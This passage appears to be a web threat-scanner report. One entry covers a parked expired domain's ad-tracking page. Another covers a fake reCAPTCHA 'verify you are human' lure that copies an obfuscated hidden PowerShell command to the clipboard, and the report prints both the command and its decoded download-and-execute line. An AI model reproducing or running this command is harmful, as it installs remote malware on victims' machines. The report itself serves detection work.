+ 's?t=6809a40d&token=' + encodeURI(token), true); xhr.send(); }; ls(new XMLHttpRequest(), scriptPath, 'c8294e00fbb336010..." }, "CaptchaElements": [ "<div id=\"tc\"></div>", ";let blurredTerms = document.getElementById('blurred-terms');if (blurredTerms !", "7883959});</script> <script> function getLoa", "} </script> <script> loadFeed(..", "} .onDesktop { display:none; } .tcHolder {" ], "HTML": "<!DOCTYPE html>\n<html data-adblockkey=\"MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_sFucTGU8IEKW6Wj40/ciWEvaKynV872P4miWJOZlDJiJIOVqOM70LEwRrbX0ChHFunX1VNCijHH6mmwxn30qXw==\" xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"en\">\n<head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"/>\n <title>jintsume.net</title>\n <style media=\"screen\">\n.asset_star0 {\n\tbackground: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;\n\twidth: 13px;\n\theight: 12px;\n\tdisplay: inline-block;\n}\n\n.asset_star1 {\n\tbackground: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat center;\n\twidth: 13px;\n\theight: 12px;\n\tdisplay: inline-block;\n}\n\n.asset_starH {\n\tbackground: url('//d38psrni17bvxu.cloudfront.net/themes/assets/starH.gif') no-repeat center;\n\twidth: 13px;\n\theight: 12px;\n\tdisplay: inline-block;\n}\n\n.sitelink {\n\tpadding-right: 16px;\n}\n\n.sellerRatings a:link,\n.sellerRatings a:visited,\n.sellerRatings a:hover,\n.sellerRatings a:active {\n\ttext-decoration: none;\n\tcursor: text;\n}\n\n.sellerRatings {\n\tmargin:0 0 3px 20px;\n}\n\n.sitelinkHolder {\n\tmargin:-15px 0 15px 35px;\n}\n\n#ajaxloaderHolder {\n\tdisplay: block;\n\twidth: 24px;\n\theight: 24px;\n\tbackground: #fff;\n\tpadding: 8px 0 0 8px;\n\tmargin:10px auto;\n\t-webkit-border-radius: 4px;\n\t-moz-border-radius: 4px;\n\tborder-radius: 4px;\n}</style> 
<style media=\"screen\">\n* {\n margin:0;padding:0\n}\n\nbody {\n background:#101c36;\n font-family: sans-serif;\n text-align: center;\n font-size:1rem;\n}\n\n.header {\n padding:1rem 1rem 0;\n overflow:hidden;\n}\n\nh1 {\n color:#848484;\n font-size:1.5rem;\n}\n\n.header-text-color:visited,\n.header-text-color:link,\n.header-text-color {\n color:#848484;\n}\n\n.comp-is-parked {\n margin: 4px 0 2px;\n}\n\n.comp-sponsored {\n text-align: left;\n margin: 0 0 -1.8rem 4px;\n}\n\n.wrapper1 {\n margin:1rem;\n}\n\n.wrapper2 {\n background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/bottom.png') no-repeat center bottom;\n padding-bottom:140px;\n}\n\n.wrapper3 {\n background:#fff;\n max-width:300px;\n margin:0 auto 1rem;\n padding-top:1px;\n padding-bottom:1px;\n}\n\n.onDesktop {\n display:none;\n}\n\n.tcHolder {\n padding-top: 2rem;\n}\n\n.adsHolder {\n margin: 1rem 0;\n padding-top: 2rem;\n overflow:hidden;\n}\n\n.footer {\n color:#626574;\n padding:2rem 1rem;\n font-size:.8rem;\n margin:0 auto;\n max-width:440px;\n}\n\n.footer a:link,\n.footer a:visited {\n color:#626574;\n}\n\n.sale_link_bold a,\n.sale_link,\n.sale_link a {\n color:#626574 !important;\n}\n\n.searchHolder {\n padding:1px 0 1px 1px;\n margin:1rem auto;\n width: 95%;\n max-width: 500px;\n}\n\n@media screen and (min-width:600px) {\n\n .comp-is-parked,\n .comp-sponsored {\n color: #848484;\n }\n\n .comp-sponsored {\n margin-left: 0;\n }\n\n .wrapper1 {\n max-width:1500px;\n margin-left:auto;\n margin-right:auto;\n }\n\n .wrapper2 {\n background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.png') no-repeat center top;\n padding-bottom:0;\n min-height:600px;\n }\n\n .wrapper3 {\n max-width:530px;\n background:none;\n }\n}\n</style> <style media=\"screen\">\n.fallback-term-holder {\n display: inline-grid;\n grid-template-columns: 1fr;\n width: 100%;\n padding-top: 50px;\n}\n\n.fallback-term-link {\n grid-column: 1 / span 1; align-self: 
center;\n padding: 50px 13px 50px 13px; border-radius: 25px;\n border: 5px solid #ffffff; margin-bottom: 20px;\n background-color: rgb(17, 38, 77);\n text-decoration-line: none;\n font-size: 18px;\n font-weight: 700;\n color: #ffffff;\n text-align: left;\n}\n\n.fallback-arrow {\n float: right;\n width: 24px;\n height: 24px;\n background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');\n}</style>\n \n </head>\n\n<body id=\"afd\">\n\n<div class=\"wrapper1\">\n <div class=\"wrapper2\">\n <div class=\"wrapper3\">\n \n<div style=\"padding-bottom: .5em; padding-top: .5em; border-radius: .125em; grid-template-columns: 1fr 1fr; display: inline-grid\">\n <div style=\"grid-column: 1 / span 1; align-self: center; justify-self: start\">\n <h1>jintsume.net</h1>\n </div>\n <div style=\"grid-column: 2 / span 1; align-self: center; justify-self: end\">\n <img src=\"/__media__/pics/10667/netsol-logos-2020-165-50.jpg\" height=\"50\" alt=\"Network Solutions\">\n </div>\n <div style=\"grid-column: 1 / span 2; align-self: end\">\n <span class=\"header-text-color\">jintsume.net expired on and is pending renewal or deletion.</span>\n </div>\n <div style=\"grid-column: 1 / span 2; justify-self: end\">\n <a target=\"_blank\" href=\"//ads.networksolutions.com/landing?code=P47C100S1N0B9A1D124E0000V100\" class=\"header-text-color\">\n Renew Your Domain Now\n </a>\n </div>\n <div style=\"grid-column: 1 / span 2; justify-self: end\">\n <a target=\"_blank\" href=\"https://www.networksolutions.com/promotions/ref/REPOINT-DPRD.html?dom=jintsume.net\" class=\"header-text-color\">\n Backorder Domain\n </a>\n </div>\n</div>\n <div class=\"tcHolder\">\n <div id=\"tc\"></div>\n </div>\n </div>\n </div>\n <div 
class=\"footer\">\n <a href=\"//jintsume.net/__media__/js/trademark.php?d=jintsume.net&type=ns\">Trademark Free</a>\n<br><br>\n<a href=\"https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd*/!autoThread2?pzuiactionzzz=CXtycX03MzYwYWU1Njk5NTk3MWFhMzJjYTZlMjc2YzVhYjllNTE0YTJiMzcwM2NmMDc0YTQwZDdlNTYyNDhjZmJmNzA4ODA2NWIwMjgwZjA2OTFmMGNiMTk0NzFhNjE5ZWUzMTMxYzUwZDI0Y2Q2ZDdhZTlmMzVkMjIyMjEzZGQ1MGE4MzJmZDYyMzRiZWUwYWY5ZTRiNmYwMTY2YjliMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRiYzE%3D*\">Review our Privacy Policy</a>\n<br><br>\n<a href=\"https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf\">Service Agreement</a>\n<br><br>\n<a href=\"https://www.networksolutions.com/\">Legal Notice</a>\n<br/><br/>\n </div>\n</div>\n\n<script type=\"text/javascript\" language=\"JavaScript\">\n var tcblock = {\n // Required and steady\n 'container': 'tc',\n 'type': 'relatedsearch',\n 'colorBackground': 'transparent',\n \n 'number': 3,\n \n // Font-Sizes and Line-Heights\n 'fontSizeAttribution': 14,\n 'fontSizeTitle': 24,\n 'lineHeightTitle': 34,\n // Colors\n 'colorAttribution': '#aaa',\n 'colorTitleLink': '#0277bd',\n // Alphabetically\n 'horizontalAlignment': 'center',\n 'noTitleUnderline': false,\n 'rolloverLinkColor': '#01579b',\n 'verticalSpacing': 10\n };\n var searchboxBlock = {\n 'container': 'search',\n 'type': 'searchbox',\n 'fontSizeSearchInput': 12,\n 'hideSearchInputBorder': false,\n 'hideSearchButtonBorder': true,\n 'fontSizeSearchButton': 13,\n 'colorBackground': 'transparent',\n 'colorSearchButton': '#0b3279',\n 'colorSearchButtonText': '#fff'\n };\n </script>\n<script type=\"text/javascript\">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMzNw=='; let search=''; let 
themedata='eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ'; let domain='jintsume.net'; let scriptPath='https://rnatrk.com'; let adtest='off';if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? 
location.search + '&' : '?') + '_xafvr=ZGU3NDM5ZGMxNmJhNzcwNjA5MDIzYWY3OTk3MWM2YzkxNzRkOTEzYSw2ODA5YTQwZGJiYTQx'; }let pageLoadedCallbackTriggered = false;let fallbackTriggered = false;let formerCalledArguments = false;let pageOptions = {'pubId': 'dp-teaminternet01','resultsPageBaseUrl': '//' + location.host + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/munin/a/tr/click?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + \"/munin/a/tr/adloaded\"+ \"?toggle=adloaded\"+ \"&uid=\" + encodeURIComponent(uniqueTrackingID)+ \"&domain=\" + encodeURIComponent(domain)+ \"&data=\" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true || status.faillisted == \"true\" || status.blocked === true || status.blocked == \"true\" ) && status.error_code != 25) {ajaxQuery(scriptPath + \"/munin/a/tr/block?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=block&reason=other&uid=\" + encodeURIComponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptPath + \"/munin/a/tr/errorcode?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=errorcode&code=\" + encodeURIComponent(status.error_code) + \"&uid=\" + encodeURIComponent(uniqueTrackingID));if ([18, 19].indexOf(parseInt(status.error_code)) != -1 && 
fallbackTriggered == false) {fallbackTriggered = true;if (typeof loadFeed === \"function\") {window.location.href = '//' + location.host;}}if (status.error_code == 20) {window.location.replace(\"//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=\" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? \"\" : \"ca-\") + pageOptions.pubid) + \"&domain_name=\" + encodeURIComponent(domain) + \"&output=html&drid=\" + encodeURIComponent(pageOptions.domainRegistrant));}}if (status.needsreview === true || status.needsreview == \"true\") {ajaxQuery(scriptPath + \"/munin/a/tr/needsreview?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=needsreview&uid=\" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true || status.adult == \"true\") && !isAdult) {ajaxQuery(scriptPath + \"/munin/a/tr/adult?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=adult&uid=\" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false || status.adult == \"false\") && isAdult) {ajaxQuery(scriptPath + \"/munin/a/tr/nonadult?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=nonadult&uid=\" + encodeURIComponent(uniqueTrackingID));}if (requestAccepted) {if (status.feed) {ajaxQuery(scriptPath + \"/munin/a/tr/feed?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=feed&feed=\" + encodeURIComponent(status.feed) + \"&uid=\" + encodeURIComponent(uniqueTrackingID));}if (status.error_code) {ajaxQuery(scriptPath + \"/munin/a/tr/answercheck/error?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=answercheck&answer=error_\" + encodeURIComponent(status.error_code) + \"&uid=\" + encodeURIComponent(uniqueTrackingID));} else {ajaxQuery(scriptPath + \"/munin/a/tr/answercheck/yes?domain=\" + encodeURIComponent(domain) + \"&caf=1&toggle=answercheck&answer=yes&uid=\" + encodeURIComponent(uniqueTrackingID));}} else {ajaxQuery(scriptPath + \"/munin/a/tr/answercheck/reject?domain=\" + encodeURIComponent(domain) + 
\"&caf=1&toggle=answercheck&answer=rejected&uid=\" + encodeURIComponent(uniqueTrackingID));}}};let x = function (obj1, obj2) {if (typeof obj1 != \"object\")obj1 = {};for (let key in obj2)obj1[key] = obj2[key];return obj1;};function getXMLhttp() {let xmlHttp = null;try {xmlHttp = new XMLHttpRequest();} catch (e) {try {xmlHttp = new ActiveXObject(\"Msxml2.XMLHTTP\");} catch (ex) {try {xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");} catch (exc) {}}}return xmlHttp;}function ajaxQuery(url) {if (adtest == 'on') return false;xmlHttp = getXMLhttp();if (!xmlHttp) return ajaxBackfill(url);xmlHttp.open(\"GET\", url, false);return xmlHttp.send(null);}function ajaxBackfill(url) {if (adtest == 'on') return false;if (url.indexOf(\"&toggle=browserjs\") > -1) return false;try {let img = document.createElement('img');img.style.visibility = 'hidden';img.style.width = '1px';img.style.height = '1px';img.src = url + \"&_t=\" + new Date().getTime();document.body.appendChild(img);} catch (e) {}}ajaxQuery(scriptPath + \"/munin/a/tr/browserjs?domain=\" + encodeURIComponent(domain) + \"&toggle=browserjs&uid=\" + encodeURIComponent(uniqueTrackingID));x(pageOptions, {resultsPageBaseUrl: 
'http://jintsume.net/?ts=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ&skrghlp=sFZdIKBq2jpfWV3qpTGu53S%2B2%2FHTUXubDO0HgmfYnnAGbSoj8aMhwLW0OmiqLlQb',hl: 'en',kw: '',terms: '',uiOptimize: true, channel: 'bucket007,bucket102', pubId: 'dp-teaminternet09_3ph',adtest: 'off',personalizedAds: false,clicktrackUrl: 'https://rnatrk.com/munin/a/tr/click' + '?click=caf' + 
'&domain=jintsume.net&uid=MTc0NTQ2MjI4NS43NDIyOjhhZTQxM2Q2ZWM1YmI3ZWNlZmU5MWIyNTE5Yjk0Mjg3YzU5ODE5ZjE1NWU2ZTljYzNhY2NlOTEyOGRmZWU4YzI6NjgwOWE0MGRiNTMzNw%3D%3D&ts=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0.LXfFrCS1WXsvZYhN0pMpIJ_IirxD6jMxm4iRtcbXhlbxcNvgUtH6zA.K0sHPEUgJE-mqbg3mcfFBQ.3AwWHekxWpV2DHMBJL_MFbEhcjRvJYzgUUhuHvb-_n11qhbCMHxfgEWcl5SxFUWPXxpXVgIF5HtWjzGBNA3GtEdoq7menOfMLbCMsjBG7oPplbdQg-amnvPSXdr6iOeIbadeJcxG6JvPYy-73oRFQmWjW7esejN4OemhpDfgb5faQOH0T7tbJSQ8h9nRgkCna6nHkTHUKeumr3RYaIariflHBLpmVLXO4k67ezgBIFw7UWsseKmEG4X0G9ifq_7L4WXx7ZceeS0GM85EacJCUEdnkNnjaemIqL3MU29R_Fb9ASoC2MFnwZXeFoUpS0_bde3nITt3lxS9y03zRREMJ50og23HVsXSAywEmQtqn0dEPDf6_rOcGlNeBdY5NmDv5e3bFzt1ERP2J61MMHq-HpmvTszMv6X2QG0AbfnXcPH6KLteB6E3BfWPVC831HOvvKjRFhixC8dVBD9R-5wcjg3iMDNZu1udqOxXvrcuDaRA6tJr5jKtZaOAhbNt4w9lmeFwshe-aYcTVizf7KQ9JZ6LQJdFnHl9Awj4aMcbutrS1JOQeMz_7Dk0EBqlwVWdn214D2RdjImPQnv5vaFvLMj7K3DV-gndhQn4VWwP871dNnLjt_K7qw2--ZTnytXp.PRCDxXuFw-uyPYsiW4SZEQ&adtest=off' });x(pageOptions, [] );x(pageOptions, { domainRegistrant:'as-drid-2513120286930328' } );function loadFeed() {let s = document.createElement('script');let blurredTerms = document.getElementById('blurred-terms');if (blurredTerms !== null) {blurredTerms.style.display = \"none\";}s.src = '//www.google.com/adsense/domains/caf.js?abp=1&adsdeli=true';document.body.appendChild(s);let a = Array.prototype.slice.call(arguments);s.onload = function () {let c = google.ads.domains.Caf;switch (a.length) {case 1:return new c(a[0]);case 2:return new c(a[0], a[1]);case 3:return new c(a[0], a[1], a[2]);case 4:return new c(a[0], a[1], a[2], a[3]);case 5:return new c(a[0], a[1], a[2], a[3], a[4]);}return c.apply(null, a);};}</script>\n<script type=\"text/javascript\">var ls = function(xhr, path, token) {\n xhr.onreadystatechange = function () {\n if (xhr.readyState === XMLHttpRequest.DONE) {\n if (xhr.status >= 200 && xhr.status <= 400) {\n if (xhr.responseText.trim() === '') {\n return;\n }\n \n 
console.log(JSON.parse(xhr.responseText))\n } else {\n console.log('There was a problem with the request.');\n }\n }\n }\n \n xhr.open('GET', path + '/munin/a/l' + 's?t=6809a40d&token=' + encodeURI(token), true);\n xhr.send();\n};\nls(new XMLHttpRequest(), scriptPath, 'c8294e00fbb336010e22617fdc174028d1a4ba2b');</script>\n<script type='text/javascript'>x(pageOptions, { \"styleId\":5837883959});</script>\n<script>\n function getLoadFeedArguments() {\n let arguments = [\n pageOptions\n ];\n\n let possibleArguments = ['adblock', 'adblock1', 'adblock2', 'tcblock', 'searchboxBlock', 'rtblock', 'rsblock', 'searchblock'];\n for (let i = 0; i < possibleArguments.length; i++) {\n if (typeof this[possibleArguments[i]] !== 'undefined') {\n arguments.push(this[possibleArguments[i]]);\n }\n }\n\n return arguments;\n }\n</script>\n\n <script>\n loadFeed(...getLoadFeedArguments());\n </script>\n</body>\n</html>\n", "ThreatLevel": "High" }
https://horno-rafelet.es/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://horno-rafelet.es/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 